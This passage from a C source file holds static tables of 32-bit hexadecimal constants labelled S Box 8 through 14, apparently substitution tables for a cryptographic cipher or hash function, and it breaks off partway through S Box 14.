0x61a72b55L,0xec83a7d5L,0x88942806L,0x90a07da5L,0xd7424b95L, /* 235*/ 0x67745b4eL,0xa31a1853L,0xca6021efL,0xdfb56c4fL,0xcbc2d915L, /* 240*/ 0x3c48e918L,0x8bae3c63L,0x6f659c71L,0xf8b754c1L,0x2782f3deL, /* 245*/ 0xf796f168L,0x71492c84L,0x33c0f5a6L,0x3144f6ecL,0x25dc412eL, /* 250*/ 0xb16c5743L,0x83a1fa7eL,0x0997b101L,0xb627e6e8L,0xcf33905cL, /* 255*/ 0x8456fb65L /* End of S Box 8 */ }, { /* Start of S Box 9 */ /* 0*/ 0xb29bea74L,0xc35da605L,0x305c1ca3L,0xd2e9f5bcL,0x6fd5bff4L, /* 5*/ 0xff347703L,0xfc45b163L,0xf498e068L,0xb71229fcL,0x81acc3fbL, /* 10*/ 0x78538a8bL,0x984ecf81L,0xa5da47a4L,0x8f259eefL,0x6475dc65L, /* 15*/ 0x081865b9L,0x49e14a3cL,0x19e66079L,0xd382e91bL,0x5b109794L, /* 20*/ 0x3f9f81e1L,0x4470a388L,0x41601abeL,0xaaf9f407L,0x8e175ef6L, /* 25*/ 0xed842297L,0x893a4271L,0x1790839aL,0xd566a99eL,0x6b417deeL, /* 30*/ 0x75c90d23L,0x715edb31L,0x723553f7L,0x9afb50c9L,0xfbc5f600L, /* 35*/ 0xcd3b6a4eL,0x97ed0fbaL,0x29689aecL,0x63135c8eL,0xf0e26c7eL, /* 40*/ 0x0692ae7fL,0xdbb208ffL,0x2ede3e9bL,0x6a65bebdL,0xd40867e9L, /* 45*/ 0xc954afc5L,0x73b08201L,0x7ffdf809L,0x1195c24fL,0x1ca5adcaL, /* 50*/ 0x74bd6d1fL,0xb393c455L,0xcadfd3faL,0x99f13011L,0x0ebca813L, /* 55*/ 0x60e791b8L,0x6597ac7aL,0x18a7e46bL,0x09cb49d3L,0x0b27df6dL, /* 60*/ 0xcfe52f87L,0xcef66837L,0xe6328035L,0xfa87c592L,0x37baff93L, /* 65*/ 0xd71fcc99L,0xdcab205cL,0x4d7a5638L,0x48012510L,0x62797558L, /* 70*/ 0xb6cf1fe5L,0xbc311834L,0x9c2373acL,0x14ec6175L,0xa439cbdfL, /* 75*/ 0x54afb0eaL,0xd686960bL,0xfdd0d47bL,0x7b063902L,0x8b78bac3L, /* 80*/ 0x26c6a4d5L,0x5c0055b6L,0x2376102eL,0x0411783eL,0x2aa3f1cdL, /* 85*/ 0x51fc6ea8L,0x701ce243L,0x9b2a0abbL,0x0ad93733L,0x6e80d03dL, /* 90*/ 0xaf6295d1L,0xf629896fL,0xa30b0648L,0x463d8dd4L,0x963f84cbL, /* 95*/ 0x01ff94f8L,0x8d7fefdcL,0x553611c0L,0xa97c1719L,0xb96af759L, /* 100*/ 0xe0e3c95eL,0x0528335bL,0x21fe5925L,0x821a5245L,0x807238b1L, /* 105*/ 0x67f23db5L,0xea6b4eabL,0x0da6f985L,0xab1bc85aL,0xef8c90e4L, /* 110*/ 0x4526230eL,0x38eb8b1cL,0x1b91cd91L,0x9fce5f0cL,0xf72cc72bL, /* 115*/ 0xc64f2617L,0xdaf7857dL,0x7d373cf1L,0x28eaedd7L,0x203887d0L, /* 120*/ 0xc49a155fL,0xa251b3b0L,0xf2d47ae3L,0x3d9ef267L,0x4a94ab2fL, /* 125*/ 0x7755a222L,0x0205e329L,0xc28fa7a7L,0xaec1fe51L,0x270f164cL, /* 130*/ 0x8c6d01bfL,0x53b5bc98L,0xc09d3febL,0x834986ccL,0x4309a12cL, /* 135*/ 0x578b2a96L,0x3bb74b86L,0x69561b4aL,0x037e32f3L,0xde335b08L, /* 140*/ 0xc5156be0L,0xe7ef09adL,0x93b834c7L,0xa7719352L,0x59302821L, /* 145*/ 0xe3529d26L,0xf961da76L,0xcb142c44L,0xa0f3b98dL,0x76502457L, /* 150*/ 0x945a414bL,0x078eeb12L,0xdff8de69L,0xeb6c8c2dL,0xbda90c4dL, /* 155*/ 0xe9c44d16L,0x168dfd66L,0xad64763bL,0xa65fd764L,0x95a29c06L, /* 160*/ 0x32d7713fL,0x40f0b277L,0x224af08fL,0x004cb5e8L,0x92574814L, /* 165*/ 0x8877d827L,0x3e5b2d04L,0x68c2d5f2L,0x86966273L,0x1d433adaL, /* 170*/ 0x8774988aL,0x3c0e0bfeL,0xddad581dL,0x2fd654edL,0x0f4769fdL, /* 175*/ 0xc181ee9dL,0x5fd88f61L,0x341dbb3aL,0x528543f9L,0xd92235cfL, /* 180*/ 0x1ea82eb4L,0xb5cd790fL,0x91d24f1eL,0xa869e6c2L,0x61f474d2L, /* 185*/ 0xcc205addL,0x0c7bfba9L,0xbf2b0489L,0xb02d72d8L,0x2b46ece6L, /* 190*/ 0xe4dcd90aL,0xb8a11440L,0xee8a63b7L,0x854dd1a1L,0xd1e00583L, /* 195*/ 0x42b40e24L,0x9e8964deL,0xb4b35d78L,0xbec76f6eL,0x24b9c620L, /* 200*/ 0xd8d399a6L,0x5adb2190L,0x2db12730L,0x3a5866afL,0x58c8fadbL, /* 205*/ 0x5d8844e7L,0x8a4bf380L,0x15a01d70L,0x79f5c028L,0x66be3b8cL, /* 210*/ 0xf3e42b53L,0x56990039L,0x2c0c3182L,0x5e16407cL,0xecc04515L, /* 215*/ 0x6c440284L,0x4cb6701aL,0x13bfc142L,0x9d039f6aL,0x4f6e92c8L, /* 220*/ 0xa1407c62L,0x8483a095L,0xc70ae1c4L,0xe20213a2L,0xbacafc41L, /* 225*/ 0x4ecc12b3L,0x4bee3646L,0x1fe807aeL,0x25217f9cL,0x35dde5f5L, /* 230*/ 0x7a7dd6ceL,0xf89cce50L,0xac07b718L,0x7e73d2c6L,0xe563e76cL, /* 235*/ 0x123ca536L,0x3948ca56L,0x9019dd49L,0x10aa88d9L,0xc82451e2L, /* 240*/ 0x473eb6d6L,0x506fe854L,0xe8bb03a5L,0x332f4c32L,0xfe1e1e72L, /* 245*/ 0xb1ae572aL,0x7c0d7bc1L,0xe1c37eb2L,0xf542aa60L,0xf1a48ea0L, /* 250*/ 0xd067b89fL,0xbbfa195dL,0x1a049b0dL,0x315946aaL,0x36d1b447L, /* 255*/ 0x6d2ebdf0L /* End of S Box 9 */ }, { /* Start of S Box 10 */ /* 0*/ 0x0d188a6dL,0x12cea0dbL,0x7e63740eL,0x6a444821L,0x253d234fL, /* 5*/ 0x6ffc6597L,0x94a6bdefL,0x33ee1b2fL,0x0a6c00c0L,0x3aa336b1L, /* 10*/ 0x5af55d17L,0x265fb3dcL,0x0e89cf4dL,0x0786b008L,0xc80055b8L, /* 15*/ 0x6b17c3ceL,0x72b05a74L,0xd21a8d78L,0xa6b70840L,0xfe8eae77L, /* 20*/ 0xed69565cL,0x55e1bcf4L,0x585c2f60L,0xe06f1a62L,0xad67c0cdL, /* 25*/ 0x7712af88L,0x9cc26acaL,0x1888053dL,0x37eb853eL,0x9215abd7L, /* 30*/ 0xde30adfcL,0x1f1038e6L,0x70c51c8aL,0x8d586c26L,0xf72bdd90L, /* 35*/ 0x4dc3ce15L,0x68eaeefaL,0xd0e9c8b9L,0x200f9c44L,0xddd141baL, /* 40*/ 0x024bf1d3L,0x0f64c9d4L,0xc421e9e9L,0x9d11c14cL,0x9a0dd9e4L, /* 45*/ 0x5f92ec19L,0x1b980df0L,0x1dcc4542L,0xb8fe8c56L,0x0c9c9167L, /* 50*/ 0x4e81eb49L,0xca368f27L,0xe3603b37L,0xea08acccL,0xac516992L, /* 55*/ 0xc34f513bL,0x804d100dL,0x6edca4c4L,0xfc912939L,0x29d219b0L, /* 60*/ 0x278aaa3cL,0x4868da7dL,0x54e890b7L,0xb46d735aL,0x514589aaL, /* 65*/ 0xd6c630afL,0x4980dfe8L,0xbe3ccc55L,0x59d41202L,0x650c078bL, /* 70*/ 0xaf3a9e7bL,0x3ed9827aL,0x9e79fc6eL,0xaadbfbaeL,0xc5f7d803L, /* 75*/ 0x3daf7f50L,0x67b4f465L,0x73406e11L,0x39313f8cL,0x8a6e6686L, /* 80*/ 0xd8075f1fL,0xd3cbfed1L,0x69c7e49cL,0x930581e0L,0xe4b1a5a8L, /* 85*/ 0xbbc45472L,0x09ddbf58L,0xc91d687eL,0xbdbffda5L,0x88c08735L, /* 90*/ 0xe9e36bf9L,0xdb5ea9b6L,0x95559404L,0x08f432fbL,0xe24ea281L, /* 95*/ 0x64663579L,0x000b8010L,0x7914e7d5L,0x32fd0473L,0xd1a7f0a4L, /* 100*/ 0x445ab98eL,0xec72993fL,0xa29a4d32L,0xb77306d8L,0xc7c97cf6L, /* 105*/ 0x7b6ab645L,0xf5ef7adfL,0xfb2e15f7L,0xe747f757L,0x5e944354L, /* 110*/ 0x234a2669L,0x47e46359L,0x9b9d11a9L,0x40762cedL,0x56f1de98L, /* 115*/ 0x11334668L,0x890a9a70L,0x1a296113L,0xb3bd4af5L,0x163b7548L, /* 120*/ 0xd51b4f84L,0xb99b2abcL,0x3cc1dc30L,0xa9f0b56cL,0x812272b2L, /* 125*/ 0x0b233a5fL,0xb650dbf2L,0xf1a0771bL,0x36562b76L,0xdc037b0fL, /* 130*/ 0x104c97ffL,0xc2ec98d2L,0x90596f22L,0x28b6620bL,0xdf42b212L, /* 135*/ 0xfdbc4243L,0xf3fb175eL,0x4a2d8b00L,0xe8f3869bL,0x30d69bc3L, /* 140*/ 0x853714c8L,0xa7751d2eL,0x31e56deaL,0xd4840b0cL,0x9685d783L, /* 145*/ 0x068c9333L,0x8fba032cL,0x76d7bb47L,0x6d0ee22bL,0xb546794bL, /* 150*/ 0xd971b894L,0x8b09d253L,0xa0ad5761L,0xee77ba06L,0x46359f31L, /* 155*/ 0x577cc7ecL,0x52825efdL,0xa4beed95L,0x9825c52aL,0xeb48029aL, /* 160*/ 0xbaae59f8L,0xcf490ee1L,0xbc990164L,0x8ca49dfeL,0x4f38a6e7L, /* 165*/ 0x2ba98389L,0x8228f538L,0x199f64acL,0x01a1cac5L,0xa8b51641L, /* 170*/ 0x5ce72d01L,0x8e5df26bL,0x60f28e1eL,0xcd5be125L,0xe5b376bfL, /* 175*/ 0x1c8d3116L,0x7132cbb3L,0xcb7ae320L,0xc0fa5366L,0xd7653e34L, /* 180*/ 0x971c88c2L,0xc62c7dd0L,0x34d0a3daL,0x868f6709L,0x7ae6fa8fL, /* 185*/ 0x22bbd523L,0x66cd3d5bL,0x1ef9288dL,0xf9cf58c1L,0x5b784e80L, /* 190*/ 0x7439a191L,0xae134c36L,0x9116c463L,0x2e9e1396L,0xf8611f3aL, /* 195*/ 0x2d2f3307L,0x247f37ddL,0xc1e2ff9dL,0x43c821e5L,0x05ed5cabL, /* 200*/ 0xef74e80aL,0x4cca6028L,0xf0ac3cbdL,0x5d874b29L,0x6c62f6a6L, /* 205*/ 0x4b2a2ef3L,0xb1aa2087L,0x62a5d0a3L,0x0327221cL,0xb096b4c6L, /* 210*/ 0x417ec693L,0xaba840d6L,0x789725ebL,0xf4b9e02dL,0xe6e00975L, /* 215*/ 0xcc04961aL,0x63f624bbL,0x7fa21ecbL,0x2c01ea7fL,0xb2415005L, /* 220*/ 0x2a8bbeb5L,0x83b2b14eL,0xa383d1a7L,0x5352f96aL,0x043ecdadL, /* 225*/ 0xce1918a1L,0xfa6be6c9L,0x50def36fL,0xf6b80ce2L,0x4543ef7cL, /* 230*/ 0x9953d651L,0xf257955dL,0x87244914L,0xda1e0a24L,0xffda4785L, /* 235*/ 0x14d327a2L,0x3b93c29fL,0x840684b4L,0x61ab71a0L,0x9f7b784aL, /* 240*/ 0x2fd570cfL,0x15955bdeL,0x38f8d471L,0x3534a718L,0x133fb71dL, /* 245*/ 0x3fd80f52L,0x4290a8beL,0x75ff44c7L,0xa554e546L,0xe1023499L, /* 250*/ 0xbf2652e3L,0x7d20399eL,0xa1df7e82L,0x177092eeL,0x217dd3f1L, /* 255*/ 0x7c1ff8d9L /* End of S Box 10 */ }, { /* Start of S Box 11 */ /* 0*/ 0x12113f2eL,0xbfbd0785L,0xf11793fbL,0xa5bff566L,0x83c7b0e5L, /* 5*/ 0x72fb316bL,0x75526a9aL,0x41e0e612L,0x7156ba09L,0x53ce7deeL, /* 10*/ 0x0aa26881L,0xa43e0d7dL,0x3da73ca3L,0x182761edL,0xbd5077ffL, /* 15*/ 0x56db4aa0L,0xe792711cL,0xf0a4eb1dL,0x7f878237L,0xec65c4e8L, /* 20*/ 0x08dc8d43L,0x0f8ce142L,0x8258abdaL,0xf4154e16L,0x49dec2fdL, /* 25*/ 0xcd8d5705L,0x6c2c3a0fL,0x5c12bb88L,0xeff3cdb6L,0x2c89ed8cL, /* 30*/ 0x7beba967L,0x2a142157L,0xc6d0836fL,0xb4f97e96L,0x6931e969L, /* 35*/ 0x514e6c7cL,0xa7792600L,0x0bbbf780L,0x59671bbdL,0x0707b676L, /* 40*/ 0x37482d93L,0x80af1479L,0x3805a60dL,0xe1f4cac1L,0x580b3074L, /* 45*/ 0x30b8d6ceL,0x05a304beL,0xd176626dL,0xebca97f3L,0xbb201f11L, /* 50*/ 0x6a1afe23L,0xffaa86e4L,0x62b4da49L,0x1b6629f5L,0xf5d9e092L, /* 55*/ 0xf37f3dd1L,0x619bd45bL,0xa6ec8e4fL,0x29c80939L,0x0c7c0c34L, /* 60*/ 0x9cfe6e48L,0xe65fd3acL,0x73613b65L,0xb3c669f9L,0xbe2e8a9eL, /* 65*/ 0x286f9678L,0x5797fd13L,0x99805d75L,0xcfb641c5L,0xa91074baL, /* 70*/ 0x6343af47L,0x6403cb46L,0x8894c8dbL,0x2663034cL,0x3c40dc5eL, /* 75*/ 0x00995231L,0x96789aa2L,0x2efde4b9L,0x7dc195e1L,0x547dadd5L, /* 80*/ 0x06a8ea04L,0xf2347a63L,0x5e0dc6f7L,0x8462dfc2L,0x1e6b2c3cL, /* 85*/ 0x9bd275b3L,0x91d419e2L,0xbcefd17eL,0xb9003924L,0xd07e7320L, /* 90*/ 0xdef0495cL,0xc36ad00eL,0x1785b1abL,0x92e20bcfL,0xb139f0e9L, /* 95*/ 0x675bb9a1L,0xaecfa4afL,0x132376cbL,0xe84589d3L,0x79a05456L, /* 100*/ 0xa2f860bcL,0x1ae4f8b5L,0x20df4db4L,0xa1e1428bL,0x3bf60a1aL, /* 105*/ 0x27ff7bf1L,0xcb44c0e7L,0xf7f587c4L,0x1f3b9b21L,0x94368f01L, /* 110*/ 0x856e23a4L,0x6f93de3fL,0x773f5bbfL,0x8b22056eL,0xdf41f654L, /* 115*/ 0xb8246ff4L,0x8d57bff2L,0xd57167eaL,0xc5699f22L,0x40734ba7L, /* 120*/ 0x5d5c2772L,0x033020a8L,0xe30a7c4dL,0xadc40fd6L,0x76353441L, /* 125*/ 0x5aa5229bL,0x81516590L,0xda49f14eL,0x4fa672a5L,0x4d9fac5fL, /* 130*/ 0x154be230L,0x8a7a5cc0L,0xce3d2f84L,0xcca15514L,0x5221360cL, /* 135*/ 0xaf0fb81eL,0x5bdd5873L,0xf6825f8fL,0x1113d228L,0x70ad996cL, /* 140*/ 0x93320051L,0x60471c53L,0xe9ba567bL,0x3a462ae3L,0x5f55e72dL, /* 145*/ 0x1d3c5ad7L,0xdcfc45ecL,0x34d812efL,0xfa96ee1bL,0x369d1ef8L, /* 150*/ 0xc9b1a189L,0x7c1d3555L,0x50845edcL,0x4bb31877L,0x8764a060L, /* 155*/ 0x8c9a9415L,0x230e1a3aL,0xb05e9133L,0x242b9e03L,0xa3b99db7L, /* 160*/ 0xc2d7fb0aL,0x3333849dL,0xd27278d4L,0xb5d3efa6L,0x78ac28adL, /* 165*/ 0xc7b2c135L,0x0926ecf0L,0xc1374c91L,0x74f16d98L,0x2274084aL, /* 170*/ 0x3f6d9cfaL,0x7ac0a383L,0xb73aff1fL,0x3909a23dL,0x9f1653aeL, /* 175*/ 0x4e2f3e71L,0xca5ab22aL,0xe01e3858L,0x90c5a7ebL,0x3e4a17dfL, /* 180*/ 0xaa987fb0L,0x488bbd62L,0xb625062bL,0x2d776bb8L,0x43b5fc08L, /* 185*/ 0x1490d532L,0xd6d12495L,0x44e89845L,0x2fe60118L,0x9d9ef950L, /* 190*/ 0xac38133eL,0xd3864329L,0x017b255aL,0xfdc2dd26L,0x256851e6L, /* 195*/ 0x318e7086L,0x2bfa4861L,0x89eac706L,0xee5940c6L,0x68c3bc2fL, /* 200*/ 0xe260334bL,0x98da90bbL,0xf818f270L,0x4706d897L,0x212d3799L, /* 205*/ 0x4cf7e5d0L,0xd9c9649fL,0xa85db5cdL,0x35e90e82L,0x6b881152L, /* 210*/ 0xab1c02c7L,0x46752b02L,0x664f598eL,0x45ab2e64L,0xc4cdb4b2L, /* 215*/ 0xba42107fL,0xea2a808aL,0x971bf3deL,0x4a54a836L,0x4253aeccL, /* 220*/ 0x1029be68L,0x6dcc9225L,0xe4bca56aL,0xc0ae50b1L,0x7e011d94L, /* 225*/ 0xe59c162cL,0xd8e5c340L,0xd470fa0bL,0xb2be79ddL,0xd783889cL, /* 230*/ 0x1cede8f6L,0x8f4c817aL,0xddb785c9L,0x860232d8L,0x198aaad9L, /* 235*/ 0xa0814738L,0x3219cffcL,0x169546d2L,0xfc0cb759L,0x55911510L, /* 240*/ 0x04d5cec3L,0xed08cc3bL,0x0d6cf427L,0xc8e38ccaL,0x0eeee3feL, /* 245*/ 0x9ee7d7c8L,0xf9f24fa9L,0xdb04b35dL,0x9ab0c9e0L,0x651f4417L, /* 250*/ 0x028f8b07L,0x6e28d9aaL,0xfba96319L,0x8ed66687L,0xfecbc58dL, /* 255*/ 0x954ddb44L /* End of S Box 11 */ }, { /* Start of S Box 12 */ /* 0*/ 0x7b0bdffeL,0x865d16b1L,0x49a058c0L,0x97abaa3fL,0xcaacc75dL, /* 5*/ 0xaba6c17dL,0xf8746f92L,0x6f48aeedL,0x8841d4b5L,0xf36a146aL, /* 10*/ 0x73c390abL,0xe6fb558fL,0x87b1019eL,0x26970252L,0x246377b2L, /* 15*/ 0xcbf676aeL,0xf923db06L,0xf7389116L,0x14c81a90L,0x83114eb4L, /* 20*/ 0x8b137559L,0x95a86a7aL,0xd5b8da8cL,0xc4df780eL,0x5a9cb3e2L, /* 25*/ 0xe44d4062L,0xe8dc8ef6L,0x9d180845L,0x817ad18bL,0xc286c85bL, /* 30*/ 0x251f20deL,0xee6d5933L,0xf6edef81L,0xd4d16c1eL,0xc94a0c32L, /* 35*/ 0x8437fd22L,0x3271ee43L,0x42572aeeL,0x5f91962aL,0x1c522d98L, /* 40*/ 0x59b23f0cL,0xd86b8804L,0x08c63531L,0x2c0d7a40L,0xb97c4729L, /* 45*/ 0x04964df9L,0x13c74a17L,0x5878362fL,0x4c808cd6L,0x092cb1e0L, /* 50*/ 0x6df02885L,0xa0c2105eL,0x8aba9e68L,0x64e03057L,0xe5d61325L, /* 55*/ 0x0e43a628L,0x16dbd62bL,0x2733d90bL,0x3ae57283L,0xc0c1052cL, /* 60*/ 0x4b6fb620L,0x37513953L,0xfc898bb3L,0x471b179fL,0xdf6e66b8L, /* 65*/ 0xd32142f5L,0x9b30fafcL,0x4ed92549L,0x105c6d99L,0x4acd69ffL, /* 70*/ 0x2b1a27d3L,0x6bfcc067L,0x6301a278L,0xad36e6f2L,0xef3ff64eL, /* 75*/ 0x56b3cadbL,0x0184bb61L,0x17beb9fdL,0xfaec6109L,0xa2e1ffa1L, /* 80*/ 0x2fd224f8L,0x238f5be6L,0x8f8570cfL,0xaeb5f25aL,0x4f1d3e64L, /* 85*/ 0x4377eb24L,0x1fa45346L,0xb2056386L,0x52095e76L,0xbb7b5adcL, /* 90*/ 0x3514e472L,0xdde81e6eL,0x7acea9c4L,0xac15cc48L,0x71c97d93L, /* 95*/ 0x767f941cL,0x911052a2L,0xffea09bfL,0xfe3ddcf0L,0x15ebf3aaL, /* 100*/ 0x9235b8bcL,0x75408615L,0x9a723437L,0xe1a1bd38L,0x33541b7eL, /* 105*/ 0x1bdd6856L,0xb307e13eL,0x90814bb0L,0x51d7217bL,0x0bb92219L, /* 110*/ 0x689f4500L,0xc568b01fL,0x5df3d2d7L,0x3c0ecd0dL,0x2a0244c8L, /* 115*/ 0x852574e8L,0xe72f23a9L,0x8e26ed02L,0x2d92cbddL,0xdabc0458L, /* 120*/ 0xcdf5feb6L,0x9e4e8dccL,0xf4f1e344L,0x0d8c436dL,0x4427603bL, /* 125*/ 0xbdd37fdaL,0x80505f26L,0x8c7d2b8eL,0xb73273c5L,0x397362eaL, /* 130*/ 0x618a3811L,0x608bfb88L,0x06f7d714L,0x212e4677L,0x28efceadL, /* 135*/ 0x076c0371L,0x36a3a4d9L,0x5487b455L,0x3429a365L,0x65d467acL, /* 140*/ 0x78ee7eebL,0x99bf12b7L,0x4d129896L,0x772a5601L,0xcce284c7L, /* 145*/ 0x2ed85c21L,0xd099e8a4L,0xa179158aL,0x6ac0ab1aL,0x299a4807L, /* 150*/ 0xbe67a58dL,0xdc19544aL,0xb8949b54L,0x8d315779L,0xb6f849c1L, /* 155*/ 0x53c5ac34L,0x66de92a5L,0xf195dd13L,0x318d3a73L,0x301ec542L, /* 160*/ 0x0cc40da6L,0xf253ade4L,0x467ee566L,0xea5585ecL,0x3baf19bbL, /* 165*/ 0x7de9f480L,0x79006e7cL,0xa9b7a197L,0xa44bd8f1L,0xfb2ba739L, /* 170*/ 0xec342fd4L,0xed4fd32dL,0x3d1789baL,0x400f5d7fL,0xc798f594L, /* 175*/ 0x4506a847L,0x034c0a95L,0xe2162c9dL,0x55a9cfd0L,0x692d832eL, /* 180*/ 0xcf9db2caL,0x5e2287e9L,0xd2610ef3L,0x1ae7ecc2L,0x48399ca0L, /* 185*/ 0xa7e4269bL,0x6ee3a0afL,0x7065bfe1L,0xa6ffe708L,0x2256804cL, /* 190*/ 0x7476e21bL,0x41b0796cL,0x7c243b05L,0x000a950fL,0x1858416bL, /* 195*/ 0xf5a53c89L,0xe9fef823L,0x3f443275L,0xe0cbf091L,0x0af27b84L, /* 200*/ 0x3ebb0f27L,0x1de6f7f4L,0xc31c29f7L,0xb166de3dL,0x12932ec3L, /* 205*/ 0x9c0c0674L,0x5cda81b9L,0xd1bd9d12L,0xaffd7c82L,0x8962bca7L, /* 210*/ 0xa342c4a8L,0x62457151L,0x82089f03L,0xeb49c670L,0x5b5f6530L, /* 215*/ 0x7e28bad2L,0x20880ba3L,0xf0faafcdL,0xce82b56fL,0x0275335cL, /* 220*/ 0xc18e8afbL,0xde601d69L,0xba9b820aL,0xc8a2be4fL,0xd7cac335L, /* 225*/ 0xd9a73741L,0x115e974dL,0x7f5ac21dL,0x383bf9c6L,0xbcaeb75fL, /* 230*/ 0xfd0350ceL,0xb5d06b87L,0x9820e03cL,0x72d5f163L,0xe3644fc9L, /* 235*/ 0xa5464c4bL,0x57048fcbL,0x9690c9dfL,0xdbf9eafaL,0xbff4649aL, /* 240*/ 0x053c00e3L,0xb4b61136L,0x67593dd1L,0x503ee960L,0x9fb4993aL, /* 245*/ 0x19831810L,0xc670d518L,0xb05b51d8L,0x0f3a1ce5L,0x6caa1f9cL, /* 250*/ 0xaacc31beL,0x949ed050L,0x1ead07e7L,0xa8479abdL,0xd6cffcd5L, /* 255*/ 0x936993efL /* End of S Box 12 */ }, { /* Start of S Box 13 */ /* 0*/ 0x472e91cbL,0x5444b5b6L,0x62be5861L,0x1be102c7L,0x63e4b31eL, /* 5*/ 0xe81f71b7L,0x9e2317c9L,0x39a408aeL,0x518024f4L,0x1731c66fL, /* 10*/ 0x68cbc918L,0x71fb0c9eL,0xd03b7fddL,0x7d6222ebL,0x9057eda3L, /* 15*/ 0x1a34a407L,0x8cc2253dL,0xb6f6979dL,0x835675dcL,0xf319be9fL, /* 20*/ 0xbe1cd743L,0x4d32fee4L,0x77e7d887L,0x37e9ebfdL,0x15f851e8L, /* 25*/ 0x23dc3706L,0x19d78385L,0xbd506933L,0xa13ad4a6L,0x913f1a0eL, /* 30*/ 0xdde560b9L,0x9a5f0996L,0xa65a0435L,0x48d34c4dL,0xe90839a7L, /* 35*/ 0x8abba54eL,0x6fd13ce1L,0xc7eebd3cL,0x0e297602L,0x58b9bbb4L, /* 40*/ 0xef7901e6L,0x64a28a62L,0xa509875aL,0xf8834442L,0x2702c709L, /* 45*/ 0x07353f31L,0x3b39f665L,0xf5b18b49L,0x4010ae37L,0x784de00bL, /* 50*/ 0x7a1121e9L,0xde918ed3L,0xc8529dcdL,0x816a5d05L,0x02ed8298L, /* 55*/ 0x04e3dd84L,0xfd2bc3e2L,0xaf167089L,0x96af367eL,0xa4da6232L, /* 60*/ 0x18ff7325L,0x05f9a9f1L,0x4fefb9f9L,0xcd94eaa5L,0xbfaa5069L, /* 65*/ 0xa0b8c077L,0x60d86f57L,0xfe71c813L,0x29ebd2c8L,0x4ca86538L, /* 70*/ 0x6bf1a030L,0xa237b88aL,0xaa8af41dL,0xe1f7b6ecL,0xe214d953L, /* 75*/ 0x33057879L,0x49caa736L,0xfa45cff3L,0xc063b411L,0xba7e27d0L, /* 80*/ 0x31533819L,0x2a004ac1L,0x210efc3fL,0x2646885eL,0x66727dcfL, /* 85*/ 0x9d7fbf54L,0xa8dd0ea8L,0x3447caceL,0x3f0c14dbL,0xb8382aacL, /* 90*/ 0x4ace3539L,0x0a518d51L,0x95178981L,0x35aee2caL,0x73f0f7e3L, /* 95*/ 0x94281140L,0x59d0e523L,0xd292cb88L,0x565d1b27L,0x7ec8fbafL, /* 100*/ 0x069af08dL,0xc127fd24L,0x0bc77b10L,0x5f03e7efL,0x453e99baL, /* 105*/ 0xeed9ff7fL,0x87b55215L,0x7915ab4cL,0xd389a358L,0x5e75ce6dL, /* 110*/ 0x28d655c0L,0xdad26c73L,0x2e2510ffL,0x9fa7eeccL,0x1d0629c3L, /* 115*/ 0xdc9c9c46L,0x2d67ecd7L,0xe75e94bdL,0x3d649e2aL,0x6c413a2bL, /* 120*/ 0x706f0d7cL,0xdfb0127bL,0x4e366b55L,0x2c825650L,0x24205720L, /* 125*/ 0xb5c998f7L,0x3e95462cL,0x756e5c72L,0x3259488fL,0x11e8771aL, /* 130*/ 0xa7c0a617L,0x577663e5L,0x089b6401L,0x8eab1941L,0xae55ef8cL, /* 135*/ 0x3aac5460L,0xd4e6262fL,0x5d979a47L,0xb19823b0L,0x7f8d6a0cL, /* 140*/ 0xffa08683L,0x0170cd0fL,0x858cd5d8L,0x53961c90L,0xc4c61556L, /* 145*/ 0x41f2f226L,0xcfcd062dL,0xf24c03b8L,0xea81df5bL,0x7be2fa52L, /* 150*/ 0xb361f98bL,0xc2901316L,0x55ba4bbcL,0x93b234a9L,0x0fbc6603L, /* 155*/ 0x80a96822L,0x6d60491fL,0x22bd00f8L,0xbcad5aadL,0x52f3f13bL, /* 160*/ 0x42fd2b28L,0xb41dd01cL,0xc52c93bfL,0xfc663094L,0x8f58d100L, /* 165*/ 0x43fecc08L,0xc6331e5dL,0xe6480f66L,0xca847204L,0x4bdf1da0L, /* 170*/ 0x30cc2efbL,0x13e02deaL,0xfb49ac45L,0xf9d4434fL,0xf47c5b9cL, /* 175*/ 0x148879c2L,0x039fc234L,0xa3db9bfcL,0xd1a1dc5cL,0x763d7cd4L, /* 180*/ 0xed6d2f93L,0xab13af6eL,0x1e8e054aL,0xd68f4f9aL,0xc30484b3L, /* 185*/ 0xd7d50afaL,0x6930855fL,0xcc07db95L,0xce746db1L,0x744e967dL, /* 190*/ 0xf16cf575L,0x8643e8b5L,0xf0eae38eL,0xe52de1d1L,0x6587dae0L, /* 195*/ 0x0c4b8121L,0x1c7ac567L,0xac0db20aL,0x36c3a812L,0x5b1a4514L, /* 200*/ 0xa9a3f868L,0xb9263baaL,0xcb3ce9d2L,0xe44fb1a4L,0x9221bc82L, /* 205*/ 0xb29390feL,0x6ab41863L,0x974a3e2eL,0x89f531c5L,0x255ca13eL, /* 210*/ 0x8b65d348L,0xec248f78L,0xd8fc16f0L,0x50ecdeeeL,0x09010792L, /* 215*/ 0x3c7d1fb2L,0xeba5426bL,0x847b417aL,0x468b40d9L,0x8dc4e680L, /* 220*/ 0x7cc1f391L,0x2f1eb086L,0x6e5baa6aL,0xe0b395daL,0xe31b2cf6L, /* 225*/ 0xd9690b0dL,0x729ec464L,0x38403ddeL,0x610b80a2L,0x5cf433abL, /* 230*/ 0xb0785fc4L,0xd512e4c6L,0xbbb7d699L,0x5a86591bL,0x10cf5376L, /* 235*/ 0x12bf9f4bL,0x980fbaa1L,0x992a4e70L,0x20fa7ae7L,0xf7996ebbL, /* 240*/ 0xc918a2beL,0x82de74f2L,0xad54209bL,0xf66b4d74L,0x1fc5b771L, /* 245*/ 0x169d9229L,0x887761dfL,0x00b667d5L,0xdb425e59L,0xb72f2844L, /* 250*/ 0x9b0ac1f5L,0x9c737e3aL,0x2b85476cL,0x6722add6L,0x44a63297L, /* 255*/ 0x0d688cedL /* End of S Box 13 */ }, { /* Start of S Box 14 */ /* 0*/ 0xabc59484L,0x4107778aL,0x8ad94c6fL,0xfe83df90L,0x0f64053fL, /* 5*/ 0xd1292e9dL,0xc5744356L,0x8dd1abb4L,0x4c4e7667L,0xfb4a7fc1L, /* 10*/ 0x74f402cbL,0x70f06afdL,0xa82286f2L,0x918dd076L,0x7a97c5ceL, /* 15*/ 0x48f7bde3L,0x6a04d11dL,0xac243ef7L,0x33ac10caL,0x2f7a341eL, /* 20*/ 0x5f75157aL,0xf4773381L,0x591c870eL,0x78df8cc8L,0x22f3adb0L, /* 25*/ 0x251a5993L,0x09fbef66L,0x796942a8L,0x97541d2eL,0x2373daa9L, /* 30*/ 0x1bd2f142L,0xb57e8eb2L,0xe1a5bfdbL,0x7d0efa92L,0xb3442c94L, /* 35*/ 